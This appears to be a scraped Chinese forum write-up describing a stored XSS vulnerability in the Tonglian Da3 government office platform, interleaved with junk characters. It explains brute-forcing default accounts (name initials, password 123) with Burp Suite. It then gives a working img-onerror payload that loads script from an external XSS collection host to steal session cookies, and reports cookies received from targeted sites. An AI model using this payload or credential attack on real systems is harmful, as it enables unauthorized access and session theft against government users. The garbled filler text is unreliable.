- u( n% b5 b! n$ ]/ c 8 p: X5 c) {$ f
同联Da3协同办公平台后台通用储存型xss漏洞
0 l3 } K7 ^/ P
. j; K' F q" m% p
1 e e# K9 Y& X$ W8 E" M2 g
平台简介:
. e" W9 D- I" I' L+ p9 A0 R0 ?8 i
0 h' s) W4 I q, x) s! y 5 l3 X* A# R4 O( u9 m
# i6 U. c: ?/ w% \
: Y# `: \0 `4 Q' _ # P) D9 _. u1 |; S" Y
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
# x. N4 A; b; i5 {
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
5 }% U! M c- t& Y$ t r' q* U5 R
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!4 l1 u; L1 I- N+ I. l* z: S
; @" T) E$ x4 C$ H* A
: g9 P7 g0 L1 f2 k- d
& @" x6 M( A; S2 m4 |3 ` O8 q8 U
& c4 n8 w' T1 C" {. X" ], } F& r+ _4 M, q$ Q7 {
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:; Y" U6 k* ?6 Z2 E! Q, d/ `
" {) X+ |. L' F ; L; ?1 e$ N- K. p: |5 h
9 c9 h8 ~8 i/ Q* G0 n
6 W0 n! @. z" _
# {% W% U, j+ K% U6 y$ u$ x
http://1.1.1.1:7197/cap-aco/#(案例2-)
/ ~5 s% t7 F. [
6 J. N+ s. z4 g' B( m
( Q' T: J+ [8 \7 l2 L
http://www.XXOO.com (案例1-官网网站)
& X. c" _* n2 q4 R1 {" v
. |( w8 y5 m9 P, x8 i 2 [; z v& `9 H+ t
漏洞详情:) `5 V. j: A" A9 |
5 p. f! d- P H
) C% y5 b- N: p# ^4 P" v
案例一、
- W3 f) n h# z% u+ L
+ q( m0 M# S/ r$ E `
; c, ]% j, v& k# i
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
' Z1 ?; Z y% m) q' y
/ ?" W% ~4 ~# ~4 R
' X. P4 n8 ~! z z8 B0 u( [ 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
( [% B; G: A3 E$ E; K6 p
; X7 u/ h* t- T# l! Q% e
8 a9 T! D. A$ G8 Y
. `0 {1 H) z" c) Y4 N4 D4 j7 k
. X' ]; Q& c; k
E1 @) q/ I* @* u8 k7 o( }2 T& D# \
/ G7 N. Y1 K! B/ \
9 o; b4 r5 ^' M& q
8 @ b* T: i M/ f status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 0 `# W4 t$ `, R7 B4 T0 g5 C k3 I0 k
v; ?0 g" t9 o1 Y% q0 H $ u7 X0 h# n5 h. }- J- c
9 c' m5 P0 l) F* V }
3 `* t: j2 D; J
$ J( {& @3 `" g N; j; _& v
# L. V9 r& j3 i- i$ F$ G: f
! N0 M% `3 o9 y" ~8 W
) |: ~, {# s# G& a% ]3 g% y 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
$ I* B, |, c6 w# L* s% [( D8 j
3 e$ c% Z) y3 v- J j7 p) r/ ~8 F
, [5 D: M1 e5 ]4 v " a f5 ^3 Y4 I3 M
% p A V3 h* f. D. O1 I
: M2 L% d' D+ P7 c" H8 u8 p
<img src=x. E8 H `2 @0 x/ a' V
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: # Z! s }+ G0 n* X. y
* X( ~9 Z; H$ h& d
# H' c% G6 a i( T! y: z4 N 1 B# ~$ h! E# E
! \0 I# g5 `; Y! ^& h' L( } r/ ]
& Z6 z0 |& |4 i4 I3 L 然后发送,接收cookie如图: ; g- @, v) Z& W
5 N+ H2 F& t+ z ' V( I, ]7 h0 {- ^9 k3 }
" e- f! {- _: o+ u2 z
( H- F6 T/ j& t" \ 5 x1 E8 r# v0 z1 W5 i; K3 L0 J
6 j4 I; p6 T4 K! T- k! P
4 s5 W0 L% B% Q6 S2 q/ D
+ W+ ] y: p2 j % |% g- n- J, r& t
) r$ r) U9 C Y0 {1 C n
' P2 m! X/ ]8 N0 ?+ r0 m % O; [& c1 O* |" t% ^9 Z% w) n
; _% K! I2 q/ r+ y& @! G X9 U
% l8 A* ^: w# V7 z 3 e% l# j5 n, @: v: w. h" @8 l* T& _% S
# Z: _; P: ]* K6 [" I5 ~, ? F
, s" T0 Y1 |( p1 `, W6 v9 P
% S/ P9 h8 W: e$ A* |' C9 c+ h; p/ M
7 o* z4 y* }9 i C$ M
7 |, q1 C& O1 |! M8 m) M1 z9 N
; G: G! A. S9 ]2 k! n( u- f
3 H2 c) Q2 d: t + W- b5 b7 r2 g% g/ B) [; W
案例2、 # H" ?/ b1 u& C3 S8 e- m7 b
( r% T g: Q" x4 x" d
& J/ u' k! y2 M8 J7 ~ 前面步骤都一样,下面看效果图:
4 H+ S/ @! ^( f F; u
* T, y" E: H8 _1 X4 ~
, O8 m. _- h& ^1 Y
$ N& a7 [4 p- K
0 i( G( T8 i3 _; R: ~8 u + N" w6 ?7 B. B; {' }# A
4 T2 n" p5 d4 J
7 K) [% T l" g4 u' {5 _9 { U' }) f& g( t' }! @
( i$ R* ]% d7 v
; O2 s- i3 M5 F; Z* R0 T7 _ * m, `% y n' {4 T" ^
7 Q* R4 Y$ K9 S- P9 p' e
) A" Y4 J& e% X" W
! w# ? R6 @: q$ Q0 a: s D: t2 A9 S$ \* F$ X
7 X/ G% n% z: W7 m; T [* z! r! C, _: F6 Q+ l
3 u3 j1 K. ^& i) q o& `7 @1 D
4 C; m2 M L* ]" ]: S+ ~; f
+ E# M% B& ~+ \8 M3 q1 n+ s
- G1 i, H3 Y! g' }+ i( s
4 R: k3 x. w5 L" w& ?* L& J& M
! s) L* Y9 m8 o2 K: U 0 q$ U7 @" L1 Y; e; w
/ @# G0 L$ u& S" `, Y/ J0 i; z
$ C: n7 N/ ?, }% @. }1 a) w1 G
9 O' \1 [ X! N7 k. r3 ?! ?8 z
$ T" F9 h. {- e& F* r B( B5 y